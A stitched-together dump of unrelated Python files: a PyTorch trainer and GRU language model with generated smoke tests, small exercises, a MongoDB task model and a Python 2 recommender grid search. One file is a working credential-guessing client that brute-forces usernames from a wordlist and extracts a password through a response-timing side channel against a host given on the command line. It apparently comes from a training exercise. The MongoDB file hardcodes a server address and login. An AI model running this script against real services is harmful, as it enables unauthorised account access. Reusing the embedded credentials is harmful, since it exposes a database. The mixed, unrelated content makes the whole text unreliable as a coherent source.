            loss = outputs['loss'] if isinstance(outputs, dict) else outputs[0]
        return (loss, outputs) if return_outputs else loss

    def inference(self, inputs, ignore_keys: Optional[List[str]]=[], metric_key_prefix: str='eval') ->List[float]:
        """
        Run prediction and returns predictions and potential metrics.
        Depending on the dataset and your use case, your test dataset may contain labels. In that case, this method
        will also return metrics, like in :obj:`evaluate()`.
        Args:
            inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
                The inputs and targets of the model.
                The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
                argument :obj:`labels`. Check your model's documentation for all accepted arguments.
            ignore_keys (:obj:`Lst[str]`, `optional`):
                A list of keys in the output of your model (if it is a dictionary) that should be ignored when
                gathering predictions.
            metric_key_prefix (:obj:`str`, `optional`, defaults to :obj:`"eval"`):
                An optional prefix to be used as the metrics key prefix. For example the metrics "bleu" will be named
                "eval_bleu" if the prefix is "eval" (default)
        .. note::
            If your predictions or labels have different sequence length (for instance because you're doing dynamic
            padding in a token classification task) the predictions will be padded (on the right) to allow for
            concatenation into one array. The padding index is -100.
        Returns: `NamedTuple` A namedtuple with the following keys:
            - predictions (:obj:`np.ndarray`): The predictions on :obj:`test_dataset`.
            - label_ids (:obj:`np.ndarray`, `optional`): The labels (if the dataset contained some).
            - metrics (:obj:`Dict[str, float]`, `optional`): The potential dictionary of metrics (if the dataset
              contained labels).
        """
        # NOTE(review): `ignore_keys=[]` is a mutable default argument — safe
        # only while nothing appends to it; kept as-is to preserve the API.
        output, batch_size = self.prediction_loop(inputs, description='Evaluation', ignore_keys=ignore_keys, metric_key_prefix=metric_key_prefix)
        return {'output': output['eval_loss'], 'acc': output['eval_acc'], 'batch_size': batch_size[0]}

    def prediction_loop(self, inputs, description: str, ignore_keys: Optional[List[str]]=None, metric_key_prefix: str='eval') ->Union[Dict, List[int]]:
        """
        Prediction/evaluation loop, shared by :obj:`Trainer.evaluate()` and :obj:`Trainer.predict()`.
        Works both with or without labels.
        """
        out_label_ids = None
        if 'labels' in inputs:
            out_label_ids = inputs['labels'].detach().cpu()
        if 'attention_mask' in inputs:
            # NOTE(review): `attention_mask` is read further down even when
            # this branch doesn't run, which would raise UnboundLocalError —
            # presumably callers always pass an attention mask; confirm.
            attention_mask = inputs['attention_mask'].detach().cpu()
        losses_host = None
        preds_host = None
        labels_host = None
        # Single-host configuration: the distributed gatherers below are only
        # exercised when num_hosts > 1.
        world_size = 1
        num_hosts = 1
        eval_losses_gatherer = DistributedTensorGatherer(world_size, num_hosts, make_multiple_of=self.batch_size)
        if not self.prediction_loss_only:
            preds_gatherer = DistributedTensorGatherer(world_size, num_hosts)
            labels_gatherer = DistributedTensorGatherer(world_size, num_hosts)
        self.model.eval()
        if self.past_index >= 0:
            self._past = None
        loss, logits, _ = self.prediction_step(inputs, ignore_keys=ignore_keys, has_labels=True)
        if loss is not None:
            # Repeat the scalar loss to batch length so it gathers per-sample.
            losses = loss.repeat(self.batch_size).cpu()
            losses_host = losses if losses_host is None else T.cat((losses_host, losses), dim=0)
        if logits is not None:
            preds_host = logits.detach().cpu() if preds_host is None else nested_concat(preds_host, logits, padding_index=-100)
        if out_label_ids is not None:
            labels_host = out_label_ids if labels_host is None else nested_concat(labels_host, out_label_ids, padding_index=-100)
        if self.eval_accumulation_steps is not None:
            # Periodically flush host tensors into the gatherers to bound memory.
            eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, 'eval_losses'))
            if not self.prediction_loss_only:
                preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, 'eval_preds'))
                labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, 'eval_label_ids'))
            losses_host, preds_host, labels_host = None, None, None
        if self.past_index and hasattr(self, '_past'):
            # NOTE(review): `past_index` defaults to -1, which is truthy, so
            # this cleanup runs whenever `_past` exists regardless of mode.
            delattr(self, '_past')
        if num_hosts > 1:
            eval_losses_gatherer.add_arrays(self._gather_and_numpify(losses_host, 'eval_losses'), want_masked=True)
            if not self.prediction_loss_only:
                preds_gatherer.add_arrays(self._gather_and_numpify(preds_host, 'eval_preds'))
                labels_gatherer.add_arrays(self._gather_and_numpify(labels_host, 'eval_label_ids'))
            eval_loss = eval_losses_gatherer.finalize()
            preds = preds_gatherer.finalize() if not self.prediction_loss_only else None
            label_ids = labels_gatherer.finalize() if not self.prediction_loss_only else None
        else:
            # Single host: the host tensors already hold everything.
            eval_loss = losses_host
            preds = preds_host
            label_ids = labels_host
        if preds is not None and label_ids is not None:
            metrics = ComputeMetrics.compute_metrics(EvalPrediction(predictions=preds, label_ids=label_ids), attention_mask)
        else:
            metrics = {}
        if eval_loss is not None:
            metrics[f'{metric_key_prefix}_loss'] = eval_loss.mean().item()
        for key in list(metrics.keys()):
            # Prefix every metric key, e.g. 'acc' -> 'eval_acc'.
            if not key.startswith(f'{metric_key_prefix}_'):
                metrics[f'{metric_key_prefix}_{key}'] = metrics.pop(key).item()
        # NOTE(review): `preds.size()` would fail if preds is None (i.e. when
        # prediction_loss_only produced no logits) — confirm callers' config.
        return metrics, preds.size()

    def _gather_and_numpify(self, tensors, name):
        """
        Gather value of `tensors` (tensor or list/tuple of nested tensors) and convert them to numpy before
        concatenating them to `gathered`
        """
        if tensors is None:
            return
        return nested_numpify(tensors)

    def prediction_step(self, inputs, ignore_keys: Optional[List[str]]=None, has_labels: bool=None) ->Tuple[Optional[float], Optional[T.Tensor], Optional[T.Tensor]]:
        """
        Perform an evaluation step on :obj:`model` using obj:`inputs`.
        Subclass and override to inject custom behavior.
        Args:
            model (:obj:`nn.Module`):
                The model to evaluate.
            inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
                The inputs and targets of the model.
                The dictionary will be unpacked before being fed to the model. Most models expect the targets under the
                argument :obj:`labels`. Check your model's documentation for all accepted arguments.
            prediction_loss_only (:obj:`bool`):
                Whether or not to return the loss only.
            ignore_keys (:obj:`Lst[str]`, `optional`):
                A list of keys in the output of your model (if it is a dictionary) that should be ignored when
                gathering predictions.
        Return:
            Tuple[Optional[float], Optional[T.Tensor], Optional[T.Tensor]]: A tuple with the loss, logits and
            labels (each being optional).
        """
        inputs = self._prepare_inputs(inputs)
        if has_labels:
            labels = inputs['labels'].detach().cpu()
            if len(labels) == 1:
                # Unwrap a singleton batch to a bare tensor.
                labels = labels[0]
        else:
            labels = None
        with T.no_grad():
            if has_labels:
                loss, outputs = self.compute_loss(inputs, return_outputs=True)
                loss = loss.mean().detach()
                if isinstance(outputs, dict):
                    logits = outputs['logits']
                else:
                    logits = outputs[1:]
            else:
                loss = None
                outputs = self.model(**inputs)
                if isinstance(outputs, dict):
                    logits = tuple(v for k, v in outputs.items() if k not in ignore_keys)
                else:
                    logits = outputs
                if self.past_index >= 0:
                    # Without labels the loss entry is absent, shifting the
                    # past/mems position by one.
                    self._past = outputs[self.past_index - 1]
        if self.prediction_loss_only:
            return loss, None, None
        logits = nested_detach(logits)
        if len(logits) == 1:
            logits = logits[0]
        return loss, logits, labels

    def floating_point_ops(self, inputs):
        """
        For models that inherit from :class:`~transformers.PreTrainedModel`, uses that method to compute the number of
        floating point operations for every backward + forward pass. If using another model, either implement such a
        method in the model or subclass and override this method.
        Args:
            inputs (:obj:`Dict[str, Union[T.Tensor, Any]]`):
                The inputs and targets of the model.
        Returns:
            :obj:`int`: The number of floating-point operations.
        """
        if hasattr(self.model, 'floating_point_ops'):
            return self.model.floating_point_ops(inputs)
        else:
            return 0

    def set_eval(self):
        """
        Bring the model into evaluation mode
        """
        self.model.eval()

    def set_train(self):
        """
        Bring the model into train mode
        """
        self.model.train()
class GRU2(T.nn.Module):
    """Minimal GRU built from two fused linear maps (input-to-gates and
    hidden-to-gates), unrolled step by step in Python."""

    def __init__(self, input_size, hidden_size, input_bias, hidden_bias):
        super(GRU2, self).__init__()
        self.input_size = input_size
        self.hidden_size = hidden_size
        self.w_ih = T.nn.Linear(input_size, 3 * hidden_size, input_bias)
        self.w_hh = T.nn.Linear(hidden_size, 3 * hidden_size, hidden_bias)

    def _forward_cell(self, input: Tensor, hidden: Tensor) ->Tensor:
        """One GRU step: fuse the reset/update/candidate gate slices into the next state."""
        in_gates = self.w_ih(input)
        hid_gates = self.w_hh(hidden)
        i_r, i_i, i_n = in_gates.chunk(3, 1)
        h_r, h_i, h_n = hid_gates.chunk(3, 1)
        reset = T.sigmoid(i_r + h_r)
        update = T.sigmoid(i_i + h_i)
        candidate = T.tanh(i_n + reset * h_n)
        # Interpolate between the candidate and the previous hidden state.
        return candidate + update * (hidden - candidate)

    def forward(self, input: Tensor) ->Tuple[Tensor, Tensor]:
        """Unroll over dim 1; returns (all states incl. the initial zeros, last state)."""
        states: List[Tensor] = [to_device(T.zeros((input.shape[0], self.hidden_size)))]
        for t in range(input.shape[1]):
            states.append(self._forward_cell(input[:, t], states[-1]))
        return T.stack(states, dim=1), states[-1]
class Embedding(T.nn.Module):
    """Tied embedding/unembedding table with a separate output bias."""

    def __init__(self, vocab_size, embedding_size):
        super(Embedding, self).__init__()
        self.vocab_size = vocab_size
        self.embedding_size = embedding_size
        self.table = T.nn.Parameter(T.zeros((vocab_size, embedding_size)))
        self.unembedding_bias = T.nn.Parameter(T.zeros(vocab_size))
        # Uniform init with bound sqrt(3 / embedding_size).
        delta = (3 / self.table.shape[1]) ** 0.5
        T.nn.init.uniform_(self.table, -delta, delta)

    def forward(self, input: Tensor, embed: bool) ->Tensor:
        """embed=True: token ids -> vectors; embed=False: vectors -> vocab
        logits via the transposed (tied) table plus the output bias."""
        if embed:
            return T.nn.functional.embedding(input, self.table)
        return input @ self.table.t() + self.unembedding_bias
def softmax(X, theta=1.0, axis=None):
    """Compute the softmax of each element along an axis of X.
    Args:
        X (ndarray): x, probably should be floats.
        theta (float): used as a multiplier prior to exponentiation. Default = 1.0
        axis : axis to compute values along. Default is the first non-singleton axis.
    Returns:
        An array the same size as X. The result will sum to 1 along the specified axis.
    """
    scores = np.atleast_2d(X)
    if axis is None:
        # Default to the first axis whose length exceeds one.
        axis = next(dim for dim, size in enumerate(scores.shape) if size > 1)
    scaled = scores * float(theta)
    # Shift by the row max for numerical stability before exponentiating.
    shifted = scaled - np.expand_dims(np.max(scaled, axis=axis), axis)
    exps = np.exp(shifted)
    probs = exps / np.expand_dims(np.sum(exps, axis=axis), axis)
    if len(X.shape) == 1:
        probs = probs.flatten()
    return probs
class GRU(BaseModel):
    # Next-word prediction model: tied-embedding GRU language model with
    # loss/inference helpers that operate on padded batches (pad ids < 0).
    def __init__(self, model_config, OOV_correct=False, dropout=0.0, topK_results=1, wantLogits=False, **kwargs):
        super(GRU, self).__init__()
        self.vocab_size = model_config['vocab_size']
        self.embedding_size = model_config['embed_dim']
        self.hidden_size = model_config['hidden_dim']
        self.embedding = Embedding(self.vocab_size, self.embedding_size)
        self.rnn = GRU2(self.embedding_size, self.hidden_size, True, True)
        # Projects hidden states back to embedding size so the embedding table
        # can be reused as the output layer (tied weights).
        self.squeeze = T.nn.Linear(self.hidden_size, self.embedding_size, bias=False)
        self.OOV_correct = OOV_correct
        self.topK_results = topK_results
        self.dropout = dropout
        self.wantLogits = wantLogits
        if self.dropout > 0.0:
            self.drop_layer = T.nn.Dropout(p=self.dropout)

    def forward(self, input: T.Tensor) ->Tuple[Tensor, Tensor]:
        # Accepts either a raw id tensor or a {'x': tensor} batch dict.
        input = input['x'] if isinstance(input, dict) else input
        input = to_device(input)
        embedding = self.embedding(input, True)
        hiddens, state = self.rnn(embedding)
        if self.dropout > 0.0:
            hiddens = self.drop_layer(hiddens)
        # Unembed: hidden -> embedding-size -> vocab logits (tied table).
        output = self.embedding(self.squeeze(hiddens), False)
        return output, state

    def loss(self, input: T.Tensor) ->T.Tensor:
        input = input['x'] if isinstance(input, dict) else input
        input = to_device(input)
        # Padding positions are encoded with negative ids; zero them out but
        # remember where they were so they are excluded from the loss.
        non_pad_mask = input >= 0
        input = input * non_pad_mask.long()
        non_pad_mask = non_pad_mask.view(-1)
        # Feed all but the last token. GRU2 prepends the initial zero state,
        # so the output keeps one position per input token and appears to
        # line up with the full-length mask — TODO confirm alignment.
        output, _ = self.forward(input[:, :-1])
        targets = input.view(-1)[non_pad_mask]
        preds = output.view(-1, self.vocab_size)[non_pad_mask]
        return T.nn.functional.cross_entropy(preds, targets)

    def inference(self, input):
        # Same masking/forward scheme as loss(), followed by top-K decoding
        # and accuracy computation.
        input = input['x'] if isinstance(input, dict) else input
        input = to_device(input)
        non_pad_mask = input >= 0
        input = input * non_pad_mask.long()
        non_pad_mask = non_pad_mask.view(-1)
        output, _ = self.forward(input[:, :-1])
        targets = input.view(-1)[non_pad_mask]
        preds = output.view(-1, self.vocab_size)[non_pad_mask]
        probs_topK, preds_topK = T.topk(preds, self.topK_results, sorted=True, dim=1)
        probs, preds = probs_topK[:, 0], preds_topK[:, 0]
        if self.OOV_correct:
            acc = preds.eq(targets).float().mean()
        else:
            # Predictions of token 0 (presumably OOV/UNK) never count as correct.
            valid = preds != 0
            acc = (preds.eq(targets) * valid).float().mean()
        if self.wantLogits:
            if 1:  # leftover debug toggle: always normalizes logits to probabilities
                output = {'probabilities': softmax(probs_topK.cpu().detach().numpy(), axis=1), 'predictions': preds_topK.cpu().detach().numpy(), 'labels': targets.cpu().detach().numpy()}
            else:
                output = {'probabilities': probs_topK.cpu().detach().numpy(), 'predictions': preds_topK.cpu().detach().numpy(), 'labels': targets.cpu().detach().numpy()}
        return {'output': output, 'acc': acc.item(), 'batch_size': input.shape[0]}
class SequenceWise(nn.Module):
    """Apply a per-step module to a (T, N, H) tensor.

    The input is flattened to (T*N, H), passed through the wrapped module,
    then reshaped back to (T, N, -1). This lets modules such as BatchNorm1d
    handle variable sequence lengths and minibatch sizes.

    :param module: Module to apply to the flattened input.
    """

    def __init__(self, module):
        super(SequenceWise, self).__init__()
        self.module = module

    def forward(self, x):
        steps, batch = x.size(0), x.size(1)
        flat = x.view(steps * batch, -1).contiguous()
        out = self.module(flat)
        return out.view(steps, batch, -1)

    def __repr__(self):
        # Same layout as the original: "<Name> (\n<module repr>)"
        return self.__class__.__name__ + ' (\n' + self.module.__repr__() + ')'
class BatchRNN(nn.Module):
    """Single RNN layer with optional sequence-wise batch norm.

    When `bidirectional` is set and `multi < 2`, the forward and backward
    outputs are summed so the feature dimension stays `hidden_size`.
    Two-dimensional inputs get a length-1 time axis inserted.
    """

    def __init__(self, input_size, hidden_size, rnn_type=nn.LSTM, bidirectional=False, batch_norm=True, dropout=0.0, multi=1):
        super(BatchRNN, self).__init__()
        self.input_size = input_size
        self.hidden_size = hidden_size
        self.batch_norm_activate = batch_norm
        self.bidirectional = bidirectional
        self.multi = multi
        self.dropout = dropout
        if self.batch_norm_activate:
            self.batch_norm = SequenceWise(nn.BatchNorm1d(input_size))
        self.rnn = rnn_type(input_size=input_size, hidden_size=hidden_size,
                            bidirectional=bidirectional, bias=True,
                            batch_first=True, dropout=self.dropout)
        self.num_directions = 2 if bidirectional else 1

    def forward(self, x):
        if x.dim() == 2:
            # promote (batch, features) to (batch, time=1, features)
            x = x.unsqueeze(1)
        if self.batch_norm_activate:
            x = self.batch_norm(x.contiguous())
        out, _ = self.rnn(x)
        if self.bidirectional and self.multi < 2:
            # sum the two directions back down to hidden_size features
            b, t = out.size(0), out.size(1)
            out = out.view(b, t, 2, -1).sum(2).view(b, t, -1)
        return out
class NeuralNetwork(nn.Module):
    """MLP, optionally preceded by a stack of bidirectional BatchRNN layers.

    `params` is a comma-separated list of layer widths (e.g. "4,8,2").
    Parameters that "need revisiting" per the original author:
    number_of_actions=2, gamma=0.99, final_epsilon=0.0001,
    initial_epsilon=0.1, number_of_iterations=2000000,
    replay_memory_size=10000, minibatch_size=32,
    optimizer=Adam(lr=1e-6), criterion=MSELoss().
    """

    def __init__(self, params, wantLSTM=False, batch_norm=False):
        super(NeuralNetwork, self).__init__()
        self.wantLSTM = wantLSTM
        self.batch_norm = batch_norm
        widths = [int(w) for w in params.split(',')]
        layers = []
        self.softmax = nn.Softmax(dim=1)
        if self.wantLSTM:
            # Bidirectional RNN stack over all but the last two widths,
            # followed by a two-layer MLP applied sequence-wise.
            # (Original computed `multi = 1 if i == 1 else 1` — always 1 —
            # and then passed the literal 1 anyway; the dead code is gone.)
            rnns = []
            for i in range(1, len(widths) - 2):
                layer = BatchRNN(input_size=widths[i - 1], hidden_size=widths[i],
                                 rnn_type=nn.LSTM, bidirectional=True,
                                 batch_norm=batch_norm, multi=1, dropout=0.0)
                rnns.append((str(i - 1), layer))
            self.rnn = nn.Sequential(OrderedDict(rnns))
            layers.append(nn.Linear(widths[-3], widths[-2], bias=True))
            layers.append(nn.ReLU(inplace=True))
            layers.append(nn.Linear(widths[-2], widths[-1], bias=True))
            self.mlp = nn.Sequential(SequenceWise(nn.Sequential(*layers)))
        else:
            if self.batch_norm:
                # the boolean flag is replaced by the actual module here
                self.batch_norm = nn.BatchNorm1d(widths[0])
            for i in range(1, len(widths) - 1):
                layers.append(nn.Linear(widths[i - 1], widths[i], bias=True))
                layers.append(nn.ReLU(inplace=True))
            layers.append(nn.Linear(widths[-2], widths[-1], bias=True))
            self.mlp = nn.Sequential(*layers)

    def forward(self, x):
        if self.wantLSTM:
            x = self.rnn(x)
        # NOTE(review): with wantLSTM=True and batch_norm=True,
        # self.batch_norm is still the bool and this call would fail —
        # behavior preserved from the original.
        if self.batch_norm:
            x = self.batch_norm(x)
        out = self.mlp(x)
        return out.squeeze()
import torch
from torch.nn import MSELoss, ReLU
from _paritybench_helpers import _mock_config, _mock_layer, _paritybench_base, _fails_compile
# Auto-generated smoke-test inventory: each entry pairs a module class with
# zero-arg factories for its constructor args/kwargs and forward args/kwargs,
# plus a flag for whether the module is expected to be jit-compilable.
TESTCASES = [
    # (nn.Module, init_args, forward_args, jit_compiles)
    (AttentivePooling,
     lambda: ([], {'dim1': 4, 'dim2': 4}),
     lambda: ([torch.rand([4, 4, 4])], {}),
     True),
    (BasicBlock,
     lambda: ([], {'inplanes': 4, 'planes': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (BatchRNN,
     lambda: ([], {'input_size': 4, 'hidden_size': 4}),
     lambda: ([torch.rand([4, 4])], {}),
     True),
    (ConvNormPool,
     lambda: ([], {'input_size': 4, 'hidden_size': 4, 'kernel_size': 4}),
     lambda: ([torch.rand([4, 4, 4])], {}),
     True),
    (DocEncoder,
     lambda: ([], {}),
     lambda: ([torch.rand([4, 300, 300])], {}),
     False),
    (Embedding,
     lambda: ([], {'vocab_size': 4, 'embedding_size': 4}),
     lambda: ([torch.rand([4, 4, 4, 4]), 0], {}),
     True),
    (GRU2,
     lambda: ([], {'input_size': 4, 'hidden_size': 4, 'input_bias': 4, 'hidden_bias': 4}),
     lambda: ([torch.rand([4, 4, 4])], {}),
     False),
    (GroupNorm2d,
     lambda: ([], {'num_features': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     False),
    (GroupNorm3d,
     lambda: ([], {'num_features': 4}),
     lambda: ([torch.rand([4, 4, 4, 4, 4])], {}),
     False),
    (SequenceWise,
     lambda: ([], {'module': _mock_layer()}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (SwapTrailingAxes,
     lambda: ([], {}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (Swish,
     lambda: ([], {}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (TimeDistributed,
     lambda: ([], {'module': _mock_layer()}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (VecTail,
     lambda: ([], {'n': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     True),
    (_GroupNorm,
     lambda: ([], {'num_features': 4}),
     lambda: ([torch.rand([4, 4, 4, 4])], {}),
     False),
]
class Test_microsoft_msrflute(_paritybench_base):
    """Generated test suite: one test per TESTCASES entry, each delegating
    to self._check with the corresponding (module, init, forward, jit) tuple."""
    def test_000(self):
        self._check(*TESTCASES[0])
    def test_001(self):
        self._check(*TESTCASES[1])
    def test_002(self):
        self._check(*TESTCASES[2])
    def test_003(self):
        self._check(*TESTCASES[3])
    def test_004(self):
        self._check(*TESTCASES[4])
    def test_005(self):
        self._check(*TESTCASES[5])
    def test_006(self):
        self._check(*TESTCASES[6])
    def test_007(self):
        self._check(*TESTCASES[7])
    def test_008(self):
        self._check(*TESTCASES[8])
    def test_009(self):
        self._check(*TESTCASES[9])
    def test_010(self):
        self._check(*TESTCASES[10])
    def test_011(self):
        self._check(*TESTCASES[11])
    def test_012(self):
        self._check(*TESTCASES[12])
    def test_013(self):
        self._check(*TESTCASES[13])
    def test_014(self):
        self._check(*TESTCASES[14])
|
# Exercise: The Elections
# Reads N (the total number of votes cast), then N vote strings, each naming
# the chosen candidate. Prints the winner's name; the exercise guarantees no
# ties, and the set of candidates is unknown in advance.
cantidadVotos = int(input(""))
candidatos = {}
for _ in range(cantidadVotos):
    candidato = input("")
    # dict.get with a default replaces the manual membership check
    candidatos[candidato] = candidatos.get(candidato, 0) + 1
# First-encountered maximum, matching the original strict '>' scan; the
# empty-ballot case still prints an empty line.
candidatoElegido = max(candidatos, key=candidatos.get) if candidatos else ""
print(candidatoElegido)
|
# Credential-guessing exercise client: connects to the host/port given on the
# command line and exchanges JSON payloads of the form
# {'login': ..., 'password': ...} with the target service.
import sys
import socket
from itertools import product
import json
from string import ascii_letters, digits
import datetime
# Candidate usernames, one per line.
with open(r"C:\Users\javie\Downloads\logins.txt") as f:
    logins = f.readlines()
logins = [x.strip() for x in logins]
ip_address = sys.argv[1]
port = int(sys.argv[2])
my_socket = socket.socket()
my_socket.connect((ip_address, port))
# A single-space password is sent while the username is being discovered.
login = {'login': '', 'password': ' '}
# Phase 1: try every upper/lower-case variant of each candidate username.
for w in logins:
    stop = False
    w1 = [[character.lower(), character.upper()] for character in w]
    for c in product(*w1):
        login['login'] = ''.join(c)
        json_login = json.dumps(login)
        my_socket.send(json_login.encode())
        response = my_socket.recv(1024)
        response = response.decode('utf-8')
        json_response = json.loads(response)
        # 'Wrong password!' means the username itself was accepted.
        if json_response['result'] == 'Wrong password!':
            with open(r"C:\Users\javie\Downloads\login_success.txt", 'a') as f:
                f.write(''.join(c))
            stop = True
            break
        else:
            with open(r"C:\Users\javie\Downloads\login_fail.txt", 'a') as f:
                f.write(''.join(c) + '\n')
    if stop:
        break
# Phase 2: grow the password one character at a time, using response latency
# as the oracle — a reply slower than 0.1 s means the prefix matched.
all_chr = ascii_letters + digits
password = ''
no_stop = True
while no_stop:
    # NOTE(review): the loop variable 'chr' shadows the builtin chr().
    for chr in all_chr:
        new_pass = password + chr
        login['password'] = new_pass
        json_login = json.dumps(login)
        my_socket.send(json_login.encode())
        time_1 = datetime.datetime.now()
        response = my_socket.recv(1024)
        time_2 = datetime.datetime.now()
        difference = time_2 - time_1
        response = response.decode('utf-8')
        json_response = json.loads(response)
        if difference.total_seconds() >= 0.1:
            password = new_pass
            break
        elif json_response['result'] == "Connection success!":
            print(json.dumps(login))
            no_stop = False
            break
my_socket.close()
|
# coding:utf-8
# File Name: plus_test
# Description : demonstrates str + str concatenation
# Author : micro
# Date: 2019/12/12
# NOTE(review): the original names were a_tuple/b_tuple/c_tuple, but
# ("microease") is NOT a tuple — parentheses without a trailing comma are
# just grouping, so it is a plain str (and 24 is an int). Renamed to match
# the actual types; the printed output is unchanged.
text = "microease"
number = 24
combined = text + str(number)
print(combined)
|
from sklearn.utils import shuffle
def get_best_tokens_dummy(corpus, each_q):
    """Return the union of the `each_q` most frequent tokens from positive
    and negative rows, with their counts summed.

    `corpus` is a DataFrame with a 'rate' column ('positive'/'negative')
    and whitespace-separated text in 'content'.
    """
    def _top_counts(label):
        # token frequencies for one sentiment class, most frequent first
        texts = corpus.loc[corpus['rate'] == label, 'content']
        return texts.str.split(expand=True).stack().value_counts().head(each_q)

    return _top_counts('positive').add(_top_counts('negative'), fill_value=0)
# -*- coding: utf-8 -*-
from mongoengine import *
from models.agent_model import Agent
# connect(db='sd',
# host='10.3.242.253',
# port=27017,
# username='sd',
# password='software_design'
# )
# Default (local) MongoDB connection, established at import time; the
# commented-out server settings above are kept for reference.
connect('software_db', host='localhost', port=27017)
class Task(Document):
    """MongoDB-backed probe task: what to measure, how often, and which
    agents run it.
    """
    name = StringField(required=True)
    task_type = StringField(required=True)
    destination = StringField(required=True)
    interval = StringField(required=True)
    agents = ListField(required=True)
    spec = ListField(required=True)
    @classmethod
    def get_all_task(cls):
        """Get all task from mongodb
        Arguments:
            None
        Returns:
            objs: a mongoengine QuerySet of all Task documents
        """
        objs = cls.objects
        return objs
    @classmethod
    def create_task(cls, name, task_type, destination, interval, agents):
        """create task from frontend
        Arguments:
            name: a str of task name
            task_type: a str of task type
            destination: a str of url
            interval: a str of number represents time
            agents: a list of available agents
        Returns:
            obj: the saved Task document
        """
        obj = cls(name=name, task_type=task_type, destination=destination, interval=interval, agents=agents).save()
        # Update agent state for task
        for agent in agents:
            agent.update(state='on')
        return obj
    # @classmethod
    # def get_task_data(cls, task_id):
    @classmethod
    def get_agents_with_id(cls, task_id):
        """Get agents id according to task id for frontend display
        """
        obj = cls.objects(id=task_id).first()
        return obj.agents
    @classmethod
    def get_task_with_id(cls, task_id):
        """Get tasks id according to task id for frontend display
        """
        obj = cls.objects(id=task_id).first()
        return obj
    # End the task and reset the probe (agent) measurement data.
    @classmethod
    def end_task(cls, task_id):
        """Turn the task's agents off, clear their collected metrics and
        delete the task document itself.
        """
        agents = cls.get_agents_with_id(task_id)
        for agent in agents:
            agent.update(state='off')
            agent.update(delay=[])
            agent.update(shake=[])
            agent.update(packet_loss=[])
        obj = cls.objects(id=task_id).first()
        obj.delete()
        return
if __name__ == '__main__':
    # Manual smoke test: creates, inspects and deletes a task against a live
    # MongoDB instance (server credentials below).
    # local test
    # connect('software_db', host='localhost', port=27017)
    # server test zzy
    connect(db='sd',
            host='10.3.242.253',
            port=27017,
            username='sd',
            password='software_design'
            )
    data = []
    # Pick only the agent(s) with the hard-coded test MAC address.
    agents = Agent.get_all_agent()
    for agent in agents:
        if agent.mac == '222':
            data.append(agent)
    task1 = Task.create_task(name='task2',task_type='ping',destination='www.baidu.com',interval='5',agents=data)
    task = Task.get_all_task().first()
    print(task.id)
    agents = Task.get_agents_with_id(task.id)
    print(agents[0].state)
    print(agents[0].packet_loss)
    task = Task.get_all_task().first()
    Task.end_task(task.id)
|
import numpy as np
import scipy.sparse as sps
from collections import namedtuple
from sklearn.model_selection import KFold, ParameterGrid
import matplotlib as mpl
mpl.use('Agg')
import matplotlib.pyplot as plt
import seaborn as sns
from sklearn.linear_model import ElasticNet, Ridge, Lasso
from sklearn.base import BaseEstimator
import time
import pandas as pd
import sys
sys.path.append('./../')
import utils.utils as ut
from TopPopular.TopPopular import TopPop
from Item_fSLIM import ItemfSLIM as IfSL
from Item_SCM import Item_SCM as ISC
def cv_search(rec, urm_expl, urm_impl, icm, non_active_items_mask, sample_size, filename):
    """Grid-search `rec`'s hyper-parameters with k-fold CV on a user sample.

    Python 2 code (print statements, dict.itervalues, builtin reduce).
    For each parameter combination, hides 25% of each sampled user's ratings,
    fits on the implicit URM and scores MAP@n on the hidden ratings; prints
    the results and writes them to <filename>.csv.
    """
    np.random.seed(1)
    # Fixed random sample of `sample_size` users, reused across the grid.
    perm = np.random.permutation(urm_expl.shape[0])[:sample_size]
    icm_sample = icm
    non_active_items_mask_sample = non_active_items_mask
    urm_sample = urm_impl[perm]
    params = {'alpha_ridge':[9500, 9750, 10000, 25000, 50000, 75000, 100000], 'k_nn':[30000],
              'similarity':['CB'], 'aa_sh':[2000]}
    grid = list(ParameterGrid(params))
    folds = 4
    kfold = KFold(n_splits=folds)
    splits = [(train, test) for train,test in kfold.split(urm_sample)]
    retained_ratings_perc = 0.75
    n = 5
    result = namedtuple('result', ['mean_score', 'std_dev', 'parameters'])
    results = []
    # Total work units (parameter combinations x folds) for progress output.
    total = float(reduce(lambda acc, x: acc * len(x), params.itervalues(), 1) * folds)
    prog = 1.0
    for pars in grid:
        print pars
        rec = rec.set_params(**pars)
        maps = []
        for row_train, row_test in splits:
            urm_train = urm_sample[row_train,:]
            rec.fit(urm_train, icm_sample)
            urm_test = urm_expl[perm][row_test,:]
            hidden_ratings = []
            for u in range(urm_test.shape[0]):
                relevant_u = urm_test[u,].nonzero()[1] # Indices of rated items for test user u
                if len(relevant_u) > 1:#1 or 2
                    np.random.shuffle(relevant_u)
                    # Zero out the last 25% of the user's (shuffled) ratings
                    # and keep those indices as the evaluation ground truth.
                    urm_test[u, relevant_u[int(len(relevant_u) * retained_ratings_perc):]] = 0
                    hidden_ratings.append(relevant_u[int(len(relevant_u) * retained_ratings_perc):])
                else:
                    hidden_ratings.append([])
            maps.append(ut.map_scorer(rec, urm_test, hidden_ratings, n, non_active_items_mask_sample)) # Assume rec to predict indices of items, NOT ids
            print "Progress: {:.2f}%".format((prog * 100) / total)
            prog += 1
            # NOTE(review): this break means only the FIRST fold is ever
            # evaluated; `total` still assumes all folds run.
            break
        print maps
        results.append(result(np.mean(maps), np.std(maps), pars))
        print "Result: ", result(np.mean(maps), np.std(maps), pars)
    # NOTE(review): `_` below relies on Python 2 list-comprehension variable
    # leakage — after the comprehension it is the last `result` tuple, whose
    # parameter keys label the extra columns.
    scores = pd.DataFrame(data=[[_.mean_score, _.std_dev] + _.parameters.values() for _ in results],
                          columns=["MAP", "Std"] + _.parameters.keys())
    print "Total scores: ", scores
    scores.to_csv(filename+'.csv', sep='\t', index=False)
def produce_enriched_urm(rec, icm, urm_original_fit, urm_original_pred, n_predictions, non_active_items_mask, load_matrix, filename):
    """Fit (or load from `filename`) the recommender, predict the top
